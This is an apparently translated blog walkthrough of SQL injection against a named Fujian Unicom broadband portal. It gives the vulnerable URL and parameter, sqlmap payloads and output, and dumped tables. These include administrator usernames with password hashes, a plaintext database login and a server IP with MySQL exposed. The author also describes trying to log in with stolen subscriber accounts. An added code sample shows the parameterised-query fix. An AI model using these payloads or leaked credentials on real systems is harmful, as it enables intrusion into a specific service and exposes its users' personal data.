
SQL injection walkthrough of a China Unicom broadband digital-home website

51自学网 2021-06-02 19:07:04
  Website maintenance

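小风 hasn't posted any tutorials lately, so today's update has to be something with more technical substance.


URL: http://fjportal.vcomlive.com/

The page footer shows that the site is

Fujian Unicom Broadband Digital Home (福建联通宽带数字家庭), jointly operated by 河南网视传媒有限公司 and 郑州威科姆科技股份有限公司

Injection point:

Open any programme; the link is http://fjportal.vcomlive.com/play/play.php?id=LBQG1120572

The id parameter is injectable.

SQLMAP

Code: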
sqlmap identified the following injection points with a total of 205 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=LBQG1120572' AND 6594=6594 AND 'vkEP'='vkEP

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=LBQG1120572' AND (SELECT 3565 FROM(SELECT COUNT(*),CONCAT(0x7162707971,(SELECT (CASE WHEN (3565=3565) THEN 1 ELSE 0 END)),0x7173637671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LXuR'='LXuR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 60 columns
    Payload: id=-6386' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707971,0x6f6a724865474f786170,0x7173637671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: id=-8719' OR 5082=SLEEP(5) AND 'GCJr'='GCJr
---
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
current database:    'Portal'
current user is DBA:    False
available databases [3]:
[*] information_schema
[*] Portal
[*] test

Database: Portal
[193 tables]
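The boolean-based blind finding above means the `id` value is spliced into the SQL text, so a true and a false condition change what the page returns. The following added example (not code from the original post or from the site; the `programs` table, the function names and the ID format are assumptions, and it runs on an in-memory SQLite database) reproduces that behaviour with the first payload from the output and shows that binding the parameter removes it.

```python
import re
import sqlite3

# Assumption: programme IDs look like the one on the page (4 capitals + 7 digits).
ID_FORMAT = re.compile(r"[A-Z]{4}[0-9]{7}")

# First payload from the sqlmap output, and the same probe with a false condition
# (the false variant is constructed for this example).
TRUE_PROBE = "LBQG1120572' AND 6594=6594 AND 'vkEP'='vkEP"
FALSE_PROBE = "LBQG1120572' AND 6594=6595 AND 'vkEP'='vkEP"


def make_db():
    """Constructed in-memory stand-in for the portal database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE programs (id TEXT PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO programs VALUES ('LBQG1120572', 'sample programme')")
    return conn


def lookup_vulnerable(conn, program_id):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so the quote in the probe closes the string literal and adds a condition.
    sql = "SELECT title FROM programs WHERE id = '" + program_id + "'"
    return conn.execute(sql).fetchall()


def lookup_bound(conn, program_id):
    # Fixed pattern: the value travels as a bound parameter and is only ever
    # compared as data, never parsed as SQL.
    sql = "SELECT title FROM programs WHERE id = ?"
    return conn.execute(sql, (program_id,)).fetchall()


def lookup_hardened(conn, program_id):
    # Defence in depth: reject malformed IDs before touching the database,
    # then still use the bound query.
    if not ID_FORMAT.fullmatch(program_id):
        raise ValueError("malformed programme id")
    return lookup_bound(conn, program_id)


def has_boolean_oracle(lookup, conn):
    """True when the true and false probes produce different results,
    which is the signal a boolean-based blind test relies on."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks a true/false signal:",
          has_boolean_oracle(lookup_vulnerable, db))
    print("bound query leaks a true/false signal:",
          has_boolean_oracle(lookup_bound, db))
    try:
        lookup_hardened(db, TRUE_PROBE)
    except ValueError as exc:
        print("validated lookup rejected the probe:", exc)
```

The same check works as a regression test after a fix: the true and false probes must return identical responses.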



Next, look at the number of records in each table.






The subscriber table holds 1.14 million user records, including account names and passwords.

Code:
Database: Portal
Table: subscriber
[19 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| address     | text         |
| area_code   | varchar(64)  |
| business_id | int(11)      |
| chargetype  | varchar(64)  |
| cl_type     | int(11)      |
| email       | varchar(64)  |
| end_time    | varchar(16)  |
| id          | int(11)      |
| locked      | tinyint(1)   |
| mobile      | varchar(64)  |
| name        | varchar(64)  |
| net_account | varchar(64)  |
| net_type    | int(11)      |
| nickname    | varchar(64)  |
| password    | varchar(255) |
| phone       | varchar(32)  |
| start_time  | int(10)      |
| tname       | varchar(64)  |
| update_flag | int(1)       |
+-------------+--------------+



Pull a few rows to take a look.




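Try logging in as a couple of arbitrary users.




But after clicking through, the site reports an illegal IP.



It looks like accounts are bound to an IP?

I didn't understand it, so I didn't test any further.

Then I looked around some more.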

Code:
Database: Portal
Table: userinfo
[4 entries]
+----+--------------+--------+---------+------------+----------+------------+----------------------------------+
| id | tele         | is_sso | purview | address    | username | truename   | password                         |
+----+--------------+--------+---------+------------+----------+------------+----------------------------------+
| 1  | 0            | 0      | 15      | 0          | admin    | admin      | 88f10d639863b00bfc885ab1b88441a9 |
| 2  | 059138288288 | 0      | 15      | 福建办事处 | fjbsc    | 福建办事处 | e9f6f0e31308c741c9a02867eabefd5a |
| 3  | 0            | 0      | 15      | <blank>    | kwbksy   | 高翔       | ce6f4aae92cf678e4204d7a737293401 |
| 9  | 156371       | 0      | 15      | <blank>    | kw       | 播控值班   | 5de19cdb3da2afdd14f0bd868f790b74 |
+----+--------------+--------+---------+------------+----------+------------+----------------------------------+



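The admin entry above is the back-end administrator account with its MD5 password, but 小风 never managed to find the back-end login address and gave up!

Finally, the database configuration information turned up as well.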

Code:
Database: Portal
Table: portal_status
[1 entry]
+---------+------------------+--------------+
| db_user | db_passwd        | portal_ip    |
+---------+------------------+--------------+
| content | content_19990908 | 58.22.63.202 |
+---------+------------------+--------------+



Then I scanned the ports of IP 58.22.63.202 and found port 3306 open, so MySQL can be connected to remotely.



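At that point the whole database could be dumped directly! It contains 1.14 million user records in total. 小风 has reported the vulnerability to the vendor.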

